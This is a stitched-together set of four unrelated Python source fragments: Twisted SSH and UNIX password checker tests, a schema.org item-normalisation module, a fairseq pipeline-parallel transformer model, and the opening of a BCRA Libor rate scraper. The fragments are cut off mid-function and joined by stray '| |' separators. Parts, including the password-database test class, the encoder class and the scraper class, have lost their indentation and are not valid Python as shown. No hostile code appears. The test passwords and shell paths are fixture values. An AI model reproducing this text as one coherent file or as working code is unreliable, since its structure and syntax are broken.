        checker = checkers.SSHProtocolChecker()
        self.assertEqual(checker.credentialInterfaces, [])
        checker.registerChecker(checkers.SSHPublicKeyDatabase(), )
        self.assertEqual(checker.credentialInterfaces, [ISSHPrivateKey])
        self.assertIsInstance(checker.checkers[ISSHPrivateKey],
                              checkers.SSHPublicKeyDatabase)
    def test_registerCheckerWithInterface(self):
        """
        If a specific interface is passed into
        L{SSHProtocolChecker.registerChecker}, that interface should be
        registered instead of what the checker specifies in
        credentialInterfaces.
        """
        checker = checkers.SSHProtocolChecker()
        self.assertEqual(checker.credentialInterfaces, [])
        checker.registerChecker(checkers.SSHPublicKeyDatabase(),
                                IUsernamePassword)
        self.assertEqual(checker.credentialInterfaces, [IUsernamePassword])
        self.assertIsInstance(checker.checkers[IUsernamePassword],
                              checkers.SSHPublicKeyDatabase)
    def test_requestAvatarId(self):
        """
        L{SSHProtocolChecker.requestAvatarId} should defer to one of its
        registered checkers to authenticate a user.
        """
        checker = checkers.SSHProtocolChecker()
        passwordDatabase = InMemoryUsernamePasswordDatabaseDontUse()
        passwordDatabase.addUser(b'test', b'test')
        checker.registerChecker(passwordDatabase)
        d = checker.requestAvatarId(UsernamePassword(b'test', b'test'))
        def _callback(avatarId):
            self.assertEqual(avatarId, b'test')
        return d.addCallback(_callback)
    def test_requestAvatarIdWithNotEnoughAuthentication(self):
        """
        If the client indicates that it is never satisfied, by always returning
        False from areDone, then L{SSHProtocolChecker} should raise
        L{NotEnoughAuthentication}.
        """
        checker = checkers.SSHProtocolChecker()
        def _areDone(avatarId):
            return False
        self.patch(checker, 'areDone', _areDone)
        passwordDatabase = InMemoryUsernamePasswordDatabaseDontUse()
        passwordDatabase.addUser(b'test', b'test')
        checker.registerChecker(passwordDatabase)
        d = checker.requestAvatarId(UsernamePassword(b'test', b'test'))
        return self.assertFailure(d, NotEnoughAuthentication)
    def test_requestAvatarIdInvalidCredential(self):
        """
        If the passed credentials aren't handled by any registered checker,
        L{SSHProtocolChecker} should raise L{UnhandledCredentials}.
        """
        checker = checkers.SSHProtocolChecker()
        d = checker.requestAvatarId(UsernamePassword(b'test', b'test'))
        return self.assertFailure(d, UnhandledCredentials)
    def test_areDone(self):
        """
        The default L{SSHProtocolChecker.areDone} should simply return True.
        """
        self.assertTrue(checkers.SSHProtocolChecker().areDone(None))
class UNIXPasswordDatabaseTests(TestCase):
"""
Tests for L{UNIXPasswordDatabase}.
"""
skip = cryptSkip or dependencySkip
def assertLoggedIn(self, d, username):
"""
Assert that the L{Deferred} passed in is called back with the value
'username'. This represents a valid login for this TestCase.
NOTE: To work, this method's return value must be returned from the
test method, or otherwise hooked up to the test machinery.
@param d: a L{Deferred} from an L{IChecker.requestAvatarId} method.
@type d: L{Deferred}
@rtype: L{Deferred}
"""
result = []
d.addBoth(result.append)
self.assertEqual(len(result), 1, "login incomplete")
if isinstance(result[0], Failure):
result[0].raiseException()
self.assertEqual(result[0], username)
def test_defaultCheckers(self):
"""
L{UNIXPasswordDatabase} with no arguments has checks the C{pwd} database
and then the C{spwd} database.
"""
checker = checkers.UNIXPasswordDatabase()
def crypted(username, password):
salt = crypt.crypt(password, username)
crypted = crypt.crypt(password, '$1$' + salt)
return crypted
pwd = UserDatabase()
pwd.addUser('alice', crypted('alice', 'password'),
1, 2, 'foo', '/foo', '/bin/sh')
# x and * are convention for "look elsewhere for the password"
pwd.addUser('bob', 'x', 1, 2, 'bar', '/bar', '/bin/sh')
spwd = ShadowDatabase()
spwd.addUser('alice', 'wrong', 1, 2, 3, 4, 5, 6, 7)
spwd.addUser('bob', crypted('bob', 'password'),
8, 9, 10, 11, 12, 13, 14)
self.patch(checkers, 'pwd', pwd)
self.patch(checkers, 'spwd', spwd)
mockos = MockOS()
self.patch(util, 'os', mockos)
mockos.euid = 2345
mockos.egid = 1234
cred = UsernamePassword(b"alice", b"password")
self.assertLoggedIn(checker.requestAvatarId(cred), | |
#
# Copyright (c) 2020 Expert System Iberia
#
"""Provides normalisation of a tree of schema.org compliant items into
a dict of identifiers to relatively flat items with references between
each other.
"""
import copy
import logging
from acred import content
from esiutils import dictu, hashu
logger = logging.getLogger(__name__)
def normalise_nested_item(tree, cfg):
    """Flatten a nested data item into an identifier index.

    :param tree: a nested data item
    :param cfg: config options
    :returns: a dict mapping identifier strings to relatively flat items
        which reference each other. The special key `mainItem` holds the
        main identifier string for the input tree.
    :rtype: dict
    """
    assert content.is_item(tree)
    logger.debug('extracting item and linked items from %s' % (list(tree.keys())))
    with_ids = ensure_ident(tree, cfg)
    index = index_ident_tree(with_ids, cfg)
    flattened = {ident: item_with_refs(item, cfg)
                 for ident, item in index.items()}
    flattened['mainItem'] = get_item_identifiers(with_ids, cfg)[0]
    return flattened
def nested_item_as_graph(tree, cfg):
    """Build a graph representation (nodes and links) of a nested data item.

    :param tree: a nested data item
    :param cfg: config options
    :returns: a graph dict with fields "nodes" and "links"
    :rtype: dict
    """
    assert content.is_item(tree)
    logger.debug('extracting item and linked items from %s' % (list(tree.keys())))
    with_ids = ensure_ident(tree, cfg)
    index = index_ident_tree(with_ids, {**cfg,
                                        'unique_id_index': True})
    pairs = [item_and_links(item, cfg) for item in index.values()]
    nodes = [node for node, _ in pairs]
    if 'ensureUrls' in cfg:
        nodes = [ensure_url(node, cfg) for node in nodes]
    links = [link
             for _, node_links in pairs
             for link in node_links]
    return {'@context': 'http://coinform.eu',
            '@type': 'Graph',
            'nodes': nodes,
            'links': links,
            'mainNode': get_item_identifiers(with_ids, cfg)[0]}
def trim_tree(tree, prop, depth):
    """Limit how deep a nested property may be followed in a data item.

    :param tree: a nested data item or a list of such items
    :param prop: the property to trim. Values of this property are assumed
        to be a single nested data item or a list of nested data items.
    :param depth: int maximum number of property jumps to follow from tree
    :returns: a trimmed version of the input tree
    :rtype: dict or list of dicts
    """
    assert type(prop) is str, '%s: %s' % (type(prop), prop)
    if type(depth) is not int or depth < 0:
        raise ValueError('depth %s' % (depth))
    if type(tree) is list:
        return [trim_tree(branch, prop, depth) for branch in tree]
    if not content.is_item(tree) or prop not in tree:
        # nothing to trim: simple values and items without the property
        return tree
    trimmed = dict(tree)
    if depth == 0:
        trimmed.pop(prop)
    else:  # depth > 0: keep the property, but trim one level deeper
        trimmed[prop] = trim_tree(trimmed[prop], prop, depth - 1)
    return trimmed
def filter_ident_index_by_type(ident_index, qtypes):
    """Select only the entries of an ident_index matching the query types.

    :param ident_index: a dict from identifier strings to data items
    :param qtypes: a single typename or a list of typenames to match
    :returns: the subset of `ident_index` whose values are items of one of
        the requested types
    :rtype: dict
    """
    if type(qtypes) is str:
        qtypes = [qtypes]
    assert type(qtypes) is list
    return {ident: item
            for ident, item in ident_index.items()
            if content.is_item(item) and content.item_matches_type(item, qtypes)}
def partition_ident_index(ident_index, partition_types):
    """Split an identity item index into per-type partitions.

    :param ident_index: an identity item index; i.e. a dict with
        identifiers as keys and data items as values
    :param partition_types: a dict mapping partition labels (strings) to
        lists of type names. The types are assumed to be disjoint.
    :returns: a dict mapping each partition label (plus the reserved label
        `_rest`) to a subset of the input `ident_index`. Merging all values
        of the result yields `ident_index` again (for item values).
    :rtype: dict
    """
    assert type(partition_types) is dict
    assert '_rest' not in partition_types, 'partition label _rest is reserved'
    partitioned = {label: {} for label in partition_types}
    partitioned['_rest'] = {}
    for ident, item in ident_index.items():
        if not content.is_item(item):
            # non-items are silently dropped, matching previous behaviour
            continue
        labels = [label
                  for label, qtypes in partition_types.items()
                  if content.item_matches_type(item, qtypes)]
        if labels:
            if len(labels) > 1:
                logger.warning('Multiple partitions match item %s: %s' % (ident, labels))
            # ties are broken by taking the first matching partition
            partitioned[labels[0]][ident] = item
        else:
            partitioned['_rest'][ident] = item
    return partitioned
def index_ident_tree(tree, cfg):
    """Build an identifier index for a tree item.

    :param tree: a possibly nested value data structure which may contain
        data items. All data items must have an identifier or other
        identifying field.
    :param cfg: configuration options
    :returns: a dict from identifier strings to branches of the input
        tree. Neither the tree nor its branches are modified. For a more
        trimmed index, map the values through `item_with_refs`.
    :rtype: dict
    """
    if type(tree) is list:
        index = {}
        for branch in tree:
            index = _index_merge(index, index_ident_tree(branch, cfg), cfg)
        return index
    if type(tree) is not dict:
        # simple values are never indexed
        return {}
    index = {}
    # first, index any nested values, skipping composite relations
    composite_rels = cfg.get('composite_rels', [])
    for key, value in tree.items():
        if key in composite_rels:
            continue
        index = _index_merge(index, index_ident_tree(value, cfg), cfg)
    # finally, register this item itself, if it is an identifiable type
    if content.is_item(tree) and tree['@type'] not in no_ident_types:
        identifiers = get_item_identifiers(tree, cfg)
        assert len(identifiers) > 0, 'Cannot index an item without identifiers'
        if cfg.get('unique_id_index', False):
            identifiers = identifiers[:1]  # keep only the first id
        for identifier in identifiers:
            assert type(identifier) == str
            index = _index_merge(index, {identifier: tree}, cfg)
    return index
def _index_merge(idx_a, idx_b, cfg):
    """Merge two item indices.

    Entries appearing in both indices are dict-merged, with the fields from
    `idx_b` taking precedence.
    """
    validate_is_item_index(idx_a)
    validate_is_item_index(idx_b)
    merged = {**idx_a, **idx_b}
    for key in set(idx_a) & set(idx_b):
        merged[key] = {**idx_a[key], **idx_b[key]}
    return merged
def validate_is_item_index(idx):
    """Check that `idx` is a well-formed item index.

    A valid item index is a dict whose keys are all strings and whose
    values are all dicts.

    :returns: True when valid
    :raises ValueError: when `idx` is not a valid item index
    """
    if type(idx) is not dict:
        raise ValueError('Object is not an item index. It must be a dict, not %s' % (type(idx)))
    if not idx:  # empty indices are OK
        return True
    if any(type(key) is not str for key in idx):
        raise ValueError('At least one key is not a string %s' % (list(idx.keys())))
    if any(type(value) is not dict for value in idx.values()):
        raise ValueError('At least one value is not a dict')
    return True
# list of types which do not require an ident
no_ident_types = ['MediaObject', 'Timing', "schema:Language", "Thing",
                  "schema:CreativeWork", 'CreativeWork',
                  'nif:String', 'schema:Rating', 'schema:ClaimReview', 'ClaimReview']
# types which, in addition, do not get a calculated `url` field (see ensure_url)
no_url_types = no_ident_types + ['Dataset', 'SentencePair']
def ensure_ident(item, cfg):
    """Return a copy of `item` where every (sub)item has a unique identifier.

    :param item: a datastructure nested schema.org compatible item
    :param cfg: config options
    :returns: a copy of the input where every item and subitem carries an
        `identifier` field (unless its type is in `no_ident_types`)
    :rtype: any
    """
    if type(item) == list:
        return [ensure_ident(sub, cfg) for sub in item]
    if type(item) != dict:
        # all other (simple) types are returned as they are
        return item
    assert dictu.is_value(item)
    processed = {key: ensure_ident(val, cfg) for key, val in item.items()}
    if not content.is_item(processed):
        # NOTE: returns a shallow copy of the *original* dict (discarding the
        # recursively processed values), matching previous behaviour
        return {**item}
    if 'identifier' in item or item['@type'] in no_ident_types:
        return processed
    return {**processed,
            'identifier': calc_identifier(processed, cfg)}
def ensure_url(item, cfg):
    """Return a copy of `item` where every suitable (sub)item has a url value.

    :param item: a datastructure nested schema.org compatible item
    :param cfg: config options
    :returns: a copy of the input where every suitable item and subitem
        carries a `url` field (unless its type is in `no_url_types`)
    :rtype: any
    """
    if type(item) == list:
        return [ensure_url(sub, cfg) for sub in item]
    if type(item) != dict:
        # all other (simple) types are returned as they are
        return item
    assert dictu.is_value(item)
    processed = {key: ensure_url(val, cfg) for key, val in item.items()}
    if not content.is_item(processed):
        # NOTE: returns a shallow copy of the *original* dict (discarding the
        # recursively processed values), matching previous behaviour
        return {**item}
    if 'url' in item:
        # optionally, make sure it matches the calculated url
        # if not a match, replace url value and put old value in sameAs?
        return processed
    if item['@type'] in no_url_types:
        return processed
    return {**processed,
            'url': calc_item_url(processed, cfg)}
def calc_identifier(item, cfg):
"""Given a data item, calculate its identifier
Any nested items must already have an identifier.
The default identifier is given by a subset of its fields.
:param item: The item for which to calculate the identifier
:param cfg: config | |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
from fairseq import utils
from fairseq.model_parallel.models.pipeline_parallel_transformer.layers import (
Embedding,
TransformerDecoderEmbedding,
TransformerDecoderLayer,
TransformerDecoderOutputLayer,
TransformerEncoderEmbedding,
TransformerEncoderLayer,
TransformerEncoderLayerNorm,
)
from fairseq.models import (
BaseFairseqModel,
FairseqDecoder,
FairseqEncoder,
register_model,
register_model_architecture,
)
from fairseq.models.fairseq_encoder import EncoderOut
from fairseq.models.transformer import (
base_architecture,
transformer_iwslt_de_en,
transformer_wmt_en_de_big,
)
from fairseq.modules import SinusoidalPositionalEmbedding
logger = logging.getLogger(__name__)
DEFAULT_MAX_SOURCE_POSITIONS = 1024
DEFAULT_MAX_TARGET_POSITIONS = 1024
@register_model("pipeline_parallel_transformer")
class PipelineParallelTransformerModel(BaseFairseqModel):
    """Transformer whose encoder and decoder stacks are flattened into one
    ``nn.Sequential`` and executed with pipeline parallelism (fairscale Pipe).

    During training the whole pipeline (``self.model``) is used. For
    inference, ``prepare_for_inference_()`` must be called first: it unpacks
    the pipeline partitions back into ``self.encoder`` / ``self.decoder``.
    """

    def __init__(self, encoder, decoder, balance, devices, chunks, checkpoint):
        try:
            from fairscale.nn import Pipe
        except ImportError:
            raise ImportError("Please install fairscale with: pip install fairscale")
        super().__init__()
        assert isinstance(encoder, FairseqEncoder)
        assert isinstance(decoder, FairseqDecoder)
        # Flatten both stacks into one module sequence; Pipe cuts partitions
        # from this sequence according to `balance`.
        encoder_module_list = (
            [encoder.embedding_layer]
            + list(encoder.encoder_layers)
            + [encoder.final_layer_norm]
        )
        self.num_encoder_modules = len(encoder_module_list)
        decoder_module_list = (
            [decoder.embedding_layer]
            + list(decoder.decoder_layers)
            + [decoder.decoder_output_layer]
        )
        self.num_decoder_modules = len(decoder_module_list)
        module_list = encoder_module_list + decoder_module_list
        self.devices = devices
        self.model = Pipe(
            nn.Sequential(*module_list),
            balance=balance,
            devices=devices,
            chunks=chunks,
            checkpoint=checkpoint,
        )
        self.encoder_max_positions = self.max_positions_helper(
            encoder.embedding_layer, "max_source_positions"
        )
        self.decoder_max_positions = self.max_positions_helper(
            decoder.embedding_layer, "max_target_positions"
        )
        self.adaptive_softmax = getattr(decoder, "adaptive_softmax", None)
        # Note: To be populated during inference (see prepare_for_inference_)
        self.encoder = None
        self.decoder = None

    def forward(self, src_tokens, src_lengths, prev_output_tokens):
        # Pack the inputs into the tuple form consumed by the pipeline.
        # BUG FIX: this used to be built only on the training branch, so the
        # inference branch referenced an undefined `input` (NameError).
        input_lst = [src_tokens, src_lengths, prev_output_tokens]
        input = tuple(i.to(self.devices[0], non_blocking=True) for i in input_lst)
        if self.training:
            return self.model(input)
        else:
            assert self.encoder is not None and self.decoder is not None, (
                "encoder and decoder need to be initialized by "
                + "calling the `prepare_for_inference_()` method"
            )
            # NOTE(review): the rebuilt encoder is fed the same packed tuple
            # the pipeline modules received during training — confirm against
            # TransformerEncoder.forward's expected inputs.
            encoder_output_tuple = self.encoder(input)
            return self.decoder(encoder_output_tuple)

    def prepare_for_inference_(self, cfg):
        """Unpack the Pipe partitions into plain encoder/decoder modules."""
        if self.encoder is not None and self.decoder is not None:
            logger.info("Encoder and Decoder already initialized")
            return
        encoder_module_list = []
        decoder_module_list = []
        module_count = 0
        # Modules were laid out encoder-first, so the first
        # `num_encoder_modules` entries belong to the encoder.
        for partition in self.model.partitions:
            for module in partition:
                if module_count < self.num_encoder_modules:
                    encoder_module_list.append(module)
                else:
                    decoder_module_list.append(module)
                module_count += 1
        self.model = None
        self.encoder = TransformerEncoder(cfg.model, None, None, encoder_module_list)
        self.decoder = TransformerDecoder(
            cfg.model, None, None, decoder_module_list=decoder_module_list
        )

    @staticmethod
    def add_args(parser):
        """Add model-specific arguments to the parser."""
        # fmt: off
        parser.add_argument('--activation-fn',
                            choices=utils.get_available_activation_fns(),
                            help='activation function to use')
        parser.add_argument('--dropout', type=float, metavar='D',
                            help='dropout probability')
        parser.add_argument('--attention-dropout', type=float, metavar='D',
                            help='dropout probability for attention weights')
        parser.add_argument('--activation-dropout', '--relu-dropout', type=float, metavar='D',
                            help='dropout probability after activation in FFN.')
        parser.add_argument('--encoder-embed-path', type=str, metavar='STR',
                            help='path to pre-trained encoder embedding')
        parser.add_argument('--encoder-embed-dim', type=int, metavar='N',
                            help='encoder embedding dimension')
        parser.add_argument('--encoder-ffn-embed-dim', type=int, metavar='N',
                            help='encoder embedding dimension for FFN')
        parser.add_argument('--encoder-layers', type=int, metavar='N',
                            help='num encoder layers')
        parser.add_argument('--encoder-attention-heads', type=int, metavar='N',
                            help='num encoder attention heads')
        parser.add_argument('--encoder-normalize-before', action='store_true',
                            help='apply layernorm before each encoder block')
        parser.add_argument('--encoder-learned-pos', action='store_true',
                            help='use learned positional embeddings in the encoder')
        parser.add_argument('--decoder-embed-path', type=str, metavar='STR',
                            help='path to pre-trained decoder embedding')
        parser.add_argument('--decoder-embed-dim', type=int, metavar='N',
                            help='decoder embedding dimension')
        parser.add_argument('--decoder-ffn-embed-dim', type=int, metavar='N',
                            help='decoder embedding dimension for FFN')
        parser.add_argument('--decoder-layers', type=int, metavar='N',
                            help='num decoder layers')
        parser.add_argument('--decoder-attention-heads', type=int, metavar='N',
                            help='num decoder attention heads')
        parser.add_argument('--decoder-learned-pos', action='store_true',
                            help='use learned positional embeddings in the decoder')
        parser.add_argument('--decoder-normalize-before', action='store_true',
                            help='apply layernorm before each decoder block')
        parser.add_argument('--share-decoder-input-output-embed', action='store_true',
                            help='share decoder input and output embeddings')
        parser.add_argument('--share-all-embeddings', action='store_true',
                            help='share encoder, decoder and output embeddings'
                                 ' (requires shared dictionary and embed dim)')
        parser.add_argument('--no-token-positional-embeddings', default=False, action='store_true',
                            help='if set, disables positional embeddings (outside self attention)')
        parser.add_argument('--adaptive-softmax-cutoff', metavar='EXPR',
                            help='comma separated list of adaptive softmax cutoff points. '
                                 'Must be used with adaptive_loss criterion'),
        parser.add_argument('--adaptive-softmax-dropout', type=float, metavar='D',
                            help='sets adaptive softmax dropout for the tail projections')
        parser.add_argument('--num-embedding-chunks', type=int, metavar='N', default=1,
                            help='Number of embedding layer chunks (enables more even distribution'
                                 'of optimizer states across data parallel nodes'
                                 'when using optimizer state sharding and'
                                 'a big embedding vocabulary)')
        # fmt: on

    @classmethod
    def build_model_base(cls, args, task):
        """Build a new model instance (shared encoder/decoder construction)."""
        # make sure all arguments are present in older models
        base_architecture(args)
        if not hasattr(args, "max_source_positions"):
            args.max_source_positions = DEFAULT_MAX_SOURCE_POSITIONS
        if not hasattr(args, "max_target_positions"):
            args.max_target_positions = DEFAULT_MAX_TARGET_POSITIONS
        src_dict, tgt_dict = task.source_dictionary, task.target_dictionary

        def build_embedding(dictionary, embed_dim, path=None, num_embed_chunks=1):
            # BUG FIX: the message previously read "chunks should be divisible
            # by the embedding dimension", the inverse of the condition tested.
            assert embed_dim % num_embed_chunks == 0, (
                f"Embedding dimension = {embed_dim} should be "
                + f"divisible by the number of embedding chunks = {num_embed_chunks}"
            )
            assert path is None or num_embed_chunks == 1, (
                "Loading embedding from a path with number of embedding chunks > 1"
                + " is not yet supported"
            )
            num_embeddings = len(dictionary)
            padding_idx = dictionary.pad()
            # if provided, load from preloaded dictionaries
            if path:
                emb = Embedding(num_embeddings, embed_dim, padding_idx)
                embed_dict = utils.parse_embedding(path)
                utils.load_embedding(embed_dict, dictionary, emb)
            else:
                embed_chunk_dim = embed_dim // num_embed_chunks
                emb = nn.ModuleList()
                for i in range(num_embed_chunks):
                    emb.append(Embedding(num_embeddings, embed_chunk_dim, padding_idx))
            return emb

        num_embed_chunks = args.num_embedding_chunks
        if args.share_all_embeddings:
            if src_dict != tgt_dict:
                raise ValueError("--share-all-embeddings requires a joined dictionary")
            if args.encoder_embed_dim != args.decoder_embed_dim:
                raise ValueError(
                    "--share-all-embeddings requires --encoder-embed-dim to match --decoder-embed-dim"
                )
            if args.decoder_embed_path and (
                args.decoder_embed_path != args.encoder_embed_path
            ):
                raise ValueError(
                    "--share-all-embeddings not compatible with --decoder-embed-path"
                )
            encoder_embed_tokens = build_embedding(
                src_dict,
                args.encoder_embed_dim,
                args.encoder_embed_path,
                num_embed_chunks,
            )
            decoder_embed_tokens = encoder_embed_tokens
            args.share_decoder_input_output_embed = True
        else:
            assert args.share_decoder_input_output_embed or num_embed_chunks == 1, (
                "Not sharing decoder I/O embeddings is not yet supported with number of "
                + "embedding chunks > 1"
            )
            encoder_embed_tokens = build_embedding(
                src_dict,
                args.encoder_embed_dim,
                args.encoder_embed_path,
                num_embed_chunks,
            )
            decoder_embed_tokens = build_embedding(
                tgt_dict,
                args.decoder_embed_dim,
                args.decoder_embed_path,
                num_embed_chunks,
            )
        encoder = cls.build_encoder(args, src_dict, encoder_embed_tokens)
        decoder = cls.build_decoder(args, tgt_dict, decoder_embed_tokens)
        return (encoder, decoder)

    @classmethod
    def build_encoder(cls, args, src_dict, embed_tokens):
        return TransformerEncoder(args, src_dict, embed_tokens)

    @classmethod
    def build_decoder(cls, args, tgt_dict, embed_tokens):
        return TransformerDecoder(args, tgt_dict, embed_tokens)

    @classmethod
    def build_model(cls, args, task):
        encoder, decoder = cls.build_model_base(args, task)
        return PipelineParallelTransformerModel(
            encoder=encoder,
            decoder=decoder,
            balance=utils.eval_str_list(args.pipeline_balance, type=int),
            devices=utils.eval_str_list(args.pipeline_devices, type=int),
            chunks=args.pipeline_chunks,
            checkpoint=args.pipeline_checkpoint,
        )

    def output_layer(self, features, **kwargs):
        """Project features to the default output size (typically vocabulary size)."""
        return self.decoder.output_layer(features, **kwargs)

    def max_positions(self):
        """Maximum length supported by the model."""
        return (self.encoder_max_positions, self.decoder_max_positions)

    def max_positions_helper(
        self, embedding_layer, max_positions_field="max_source_positions"
    ):
        """Maximum input length supported by the encoder or decoder."""
        if embedding_layer.embed_positions is None:
            return getattr(embedding_layer, max_positions_field)
        return min(
            getattr(embedding_layer, max_positions_field),
            embedding_layer.embed_positions.max_positions,
        )

    def get_normalized_probs(self, net_output, log_probs, sample=None):
        """Get normalized probabilities (or log probs) from a net's output."""
        if hasattr(self, "adaptive_softmax") and self.adaptive_softmax is not None:
            if sample is not None:
                assert "target" in sample
                target = sample["target"]
            else:
                target = None
            out = self.adaptive_softmax.get_log_prob(net_output, target=target)
            return out.exp_() if not log_probs else out
        # A Pipe() module returns a tuple of tensors as the output.
        # In this case, the tuple has one element - the output tensor of logits
        logits = net_output if isinstance(net_output, torch.Tensor) else net_output[0]
        if log_probs:
            return utils.log_softmax(logits, dim=-1, onnx_trace=False)
        else:
            return utils.softmax(logits, dim=-1, onnx_trace=False)

    def max_decoder_positions(self):
        """Maximum length supported by the decoder."""
        return self.decoder_max_positions

    def load_state_dict(self, state_dict, strict=True, cfg=None):
        """Copies parameters and buffers from *state_dict* into this module and
        its descendants.

        Overrides the method in :class:`nn.Module`. Compared with that method
        this additionally "upgrades" *state_dicts* from old checkpoints, and
        converts checkpoints saved by a regular (non-pipelined) transformer
        into the `model.partitions.*` layout used here.
        """
        self.upgrade_state_dict(state_dict)
        is_regular_transformer = not any("model.partitions" in k for k in state_dict)
        if is_regular_transformer:
            state_dict = self.convert_to_pipeline_parallel_state_dict(state_dict)
        return super().load_state_dict(state_dict, strict)

    def convert_to_pipeline_parallel_state_dict(self, state_dict):
        """Remap `encoder.*` / `decoder.*` keys onto `model.partitions.*` keys."""
        new_state_dict = self.state_dict()
        encoder_layer_idx = 0
        decoder_layer_idx = 0
        encoder_key_suffixes = [
            "self_attn.k_proj.weight",
            "self_attn.k_proj.bias",
            "self_attn.v_proj.weight",
            "self_attn.v_proj.bias",
            "self_attn.q_proj.weight",
            "self_attn.q_proj.bias",
            "self_attn.out_proj.weight",
            "self_attn.out_proj.bias",
            "self_attn_layer_norm.weight",
            "self_attn_layer_norm.bias",
            "fc1.weight",
            "fc1.bias",
            "fc2.weight",
            "fc2.bias",
            "final_layer_norm.weight",
            "final_layer_norm.bias",
        ]
        decoder_key_suffixes = [
            "self_attn.k_proj.weight",
            "self_attn.k_proj.bias",
            "self_attn.v_proj.weight",
            "self_attn.v_proj.bias",
            "self_attn.q_proj.weight",
            "self_attn.q_proj.bias",
            "self_attn.out_proj.weight",
            "self_attn.out_proj.bias",
            "self_attn_layer_norm.weight",
            "self_attn_layer_norm.bias",
            "encoder_attn.k_proj.weight",
            "encoder_attn.k_proj.bias",
            "encoder_attn.v_proj.weight",
            "encoder_attn.v_proj.bias",
            "encoder_attn.q_proj.weight",
            "encoder_attn.q_proj.bias",
            "encoder_attn.out_proj.weight",
            "encoder_attn.out_proj.bias",
            "encoder_attn_layer_norm.weight",
            "encoder_attn_layer_norm.bias",
            "fc1.weight",
            "fc1.bias",
            "fc2.weight",
            "fc2.bias",
            "final_layer_norm.weight",
            "final_layer_norm.bias",
        ]
        for pid, partition in enumerate(self.model.partitions):
            logger.info(f"Begin Partition {pid}")
            for mid, module in enumerate(partition):
                # fmt: off
                if isinstance(module, TransformerEncoderEmbedding):
                    new_state_dict[f'model.partitions.{pid}.{mid}.embed_tokens.weight'] = state_dict['encoder.embed_tokens.weight']
                    new_state_dict[f'model.partitions.{pid}.{mid}.embed_positions._float_tensor'] = state_dict['encoder.embed_positions._float_tensor']
                if isinstance(module, TransformerEncoderLayer):
                    for suffix in encoder_key_suffixes:
                        new_state_dict[f'model.partitions.{pid}.{mid}.{suffix}'] = state_dict[f'encoder.layers.{encoder_layer_idx}.{suffix}']
                    encoder_layer_idx += 1
                if isinstance(module, TransformerDecoderLayer):
                    for suffix in decoder_key_suffixes:
                        new_state_dict[f'model.partitions.{pid}.{mid}.{suffix}'] = state_dict[f'decoder.layers.{decoder_layer_idx}.{suffix}']
                    decoder_layer_idx += 1
                if isinstance(module, TransformerEncoderLayerNorm):
                    if 'encoder.layer_norm.weight' in state_dict:
                        new_state_dict[f'model.partitions.{pid}.{mid}.layer_norm.weight'] = state_dict['encoder.layer_norm.weight']
                        new_state_dict[f'model.partitions.{pid}.{mid}.layer_norm.bias'] = state_dict['encoder.layer_norm.bias']
                if isinstance(module, TransformerDecoderEmbedding):
                    new_state_dict[f'model.partitions.{pid}.{mid}.embed_tokens.weight'] = state_dict['decoder.embed_tokens.weight']
                    new_state_dict[f'model.partitions.{pid}.{mid}.embed_positions._float_tensor'] = state_dict['decoder.embed_positions._float_tensor']
                if isinstance(module, TransformerDecoderOutputLayer):
                    new_state_dict[f'model.partitions.{pid}.{mid}.output_projection.weight'] = state_dict['decoder.output_projection.weight']
                # fmt: on
        return new_state_dict
class TransformerEncoder(FairseqEncoder):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
args (argparse.Namespace): parsed command-line arguments
dictionary (~fairseq.data.Dictionary): encoding dictionary
embed_tokens (torch.nn.Embedding): input embedding
"""
def __init__(self, args, dictionary, embed_tokens, encoder_module_list=None):
super().__init__(dictionary)
self.register_buffer("version", torch.Tensor([3]))
try:
from fairscale.nn import Pipe
except ImportError:
raise ImportError("Please install fairscale with: pip install fairscale")
if encoder_module_list is None:
embedding_layer = TransformerEncoderEmbedding(args, embed_tokens)
layers = [TransformerEncoderLayer(args) for i in range(args.encoder_layers)]
if isinstance(embed_tokens, nn.ModuleList):
emb_dim = sum(e.embedding_dim for e in embed_tokens)
else:
emb_dim = embed_tokens.embedding_dim
final_layer_norm = TransformerEncoderLayerNorm(args, emb_dim)
encoder_module_list | |
<filename>bcra_scraper/scraper_libor.py<gh_stars>1-10
from csv import DictWriter
from datetime import date, timedelta, datetime
from decimal import Decimal
from functools import reduce
import logging
import os
from bs4 import BeautifulSoup
from selenium.webdriver.common.keys import Keys
import pandas as pd
import progressbar
from bcra_scraper.scraper_base import BCRAScraper
from bcra_scraper.exceptions import InvalidConfigurationError
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import TimeoutException, NoSuchElementException, WebDriverException
class BCRALiborScraper(BCRAScraper):
"""
Clase que representa un Scraper para la tasa Libor del
BCRA (Banco Central de la República Argentina).
Attributes
----------
url : str
Una cadena que representa una url válida, usada para obtener
el contenido a ser scrapeado
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
Methods
-------
fetch_contents(start_date, end_date)
Obtiene los contenidos a ser parseados
fetch_day_content(single_date)
Obtiene el contenido para una determinada fecha
parse_contents(start_date, end_date)
Recibe un iterable de contenidos y devuelve un iterable con la
información scrapeada
parse_day_content(content)
Recibe un contenido, lo scrapea y lo devuelve como un iterable
preprocess_rows(rates, rows)
Recibe un diccionario con los valores para los plazos en días
de la tasa y un iterable con los contenidos scrapeados, y devuelve
un iterable con la información normalizada
preprocess_header(self, rates, header)
Recibe un diccionario con los valores para los plazos en días
de la tasa y una lista con los header que seran estandarizados
run(start_date, end_date)
Llama a los métodos que obtienen y scrapean los contenidos
y los devuelve en un iterable
"""
def __init__(self, url, rates, intermediate_panel_path, *args, **kwargs):
"""
Parameters
----------
url : str
Una cadena que representa una url válida, usada para obtener
el contenido a ser scrapeado. Una URL se considera válida cuando su
contenido no está vacio.
rates : Dict
Diccionario que contiene los plazos en días de la tasa Libor
"""
self.rates = rates
self.intermediate_panel_path = intermediate_panel_path
super(BCRALiborScraper, self).__init__(url, *args, **kwargs)
def fetch_contents(self, start_date, end_date, intermediate_panel_data, fetched_contents):
"""
Recorre un rango de fechas y llama a un método.
Retorna un iterable donde cada elemento es un String, o una lista
vacía si no hay contenidos.
Parameters
----------
start_date : date
fecha de inicio que va a tomar como referencia el scraper
end_date: date
fecha de fin que va a tomar como referencia el scraper
"""
contents = {}
day_count = (end_date - start_date).days + 1
cont = 0
bar = progressbar.ProgressBar(max_value=day_count, redirect_stdout=True, \
